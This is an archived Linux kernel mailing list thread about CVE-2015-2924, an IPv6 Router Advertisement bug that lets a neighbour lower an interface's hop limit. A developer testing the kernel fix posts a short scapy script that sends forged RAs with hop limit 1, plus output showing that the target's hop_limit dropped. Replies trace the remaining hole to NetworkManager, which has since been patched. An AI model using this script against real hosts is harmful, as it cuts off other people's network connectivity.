lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date:	Wed, 29 Apr 2015 11:50:35 -0500
From:	Dan Williams <dcbw@...hat.com>
To:	"D.S. Ljungmark" <ljungmark@...io.se>
Cc:	Denys Vlasenko <vda.linux@...glemail.com>,
	David Miller <davem@...emloft.net>,
	Linus Torvalds <torvalds@...ux-foundation.org>,
	Andrew Morton <akpm@...ux-foundation.org>,
	netdev@...r.kernel.org,
	Linux Kernel Mailing List <linux-kernel@...r.kernel.org>,
	Hannes Frederic Sowa <hannes@...essinduktion.org>,
	Don Howard <dhoward@...hat.com>
Subject: Re: [GIT] Networking

On Wed, 2015-04-29 at 17:17 +0200, D.S. Ljungmark wrote:
> On 29/04/15 16:51, Denys Vlasenko wrote:
> > On Wed, Apr 1, 2015 at 9:48 PM, David Miller <davem@...emloft.net> wrote:
> >> D.S. Ljungmark (1):
> >>       ipv6: Don't reduce hop limit for an interface
> > 
> > https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=6fd99094de2b83d1d4c8457f2c83483b2828e75a
> > 
> > I was testing this change and apparently it doesn't close the hole.
> > 
> > The python script I use to send RAs:
> > 
> > #!/usr/bin/env python
> > import sys
> > import time
> > import scapy.all
> > from scapy.layers.inet6 import *
> > ip = IPv6()
> > # ip.dst = 'ff02::1'
> > ip.dst = sys.argv[1]
> > icmp = ICMPv6ND_RA()
> > icmp.chlim = 1
> > for x in range(10):
> >     send(ip/icmp)
> >     time.sleep(1)
> > 
> > # ./ipv6-hop-limit.py fe80::21e:37ff:fed0:5006
> > .
> > Sent 1 packets.
> > ...<10 times>...
> > Sent 1 packets.
> > 
> > After I do this, on the targeted machine I check hop_limits:
> > 
> > # for f in /proc/sys/net/ipv6/conf/*/hop_limit; do echo -n $f:; cat $f; done
> > /proc/sys/net/ipv6/conf/all/hop_limit:64
> > /proc/sys/net/ipv6/conf/default/hop_limit:64
> > /proc/sys/net/ipv6/conf/enp0s25/hop_limit:1  <=== THIS
> > /proc/sys/net/ipv6/conf/lo/hop_limit:64
> > /proc/sys/net/ipv6/conf/wlp3s0/hop_limit:64
> > 
> > As you see, the interface which received RAs still lowered
> > its hop_limit to 1. I take it means that the bug is still present
> > (right? I'm not a network guy...).
> 
> It might not be present in the _kernel_. Do you run NetworkManager on
> your system? If so, see below.
> 
> > 
> > I triple-checked that I do run the kernel with the fix.
> > Further investigation shows that the code touched by the fix
> > is not even reached, hop_limit is changed elsewhere.
> > 
> > I'm willing to test additional patches.
> 
> NetworkManager had it's own re-implementation of the bug. It got fixed
> with NetworkManager commit:
> 
> commit bdaaf9849b0cacf131b71fa2ae168f5db796874f
> Author: Thomas Haller <thaller@...hat.com>
> Date:   Wed Apr 8 15:54:30 2015 +0200
> 
>     platform: don't accept lowering IPv6 hop-limit from RA (CVE-2015-2924)
> 
> 
> 
> Beforte that commit, NetworkManager would take the RA packet, extract
> the hop limit, and write it to the sysctl itself.

Yup, we basically followed the original kernel logic here, so we needed
to patch it in NM as well.  It's been backported to NM 0.9.10, 1.0, and
obviously is in git master.

Dan

--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@...r.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ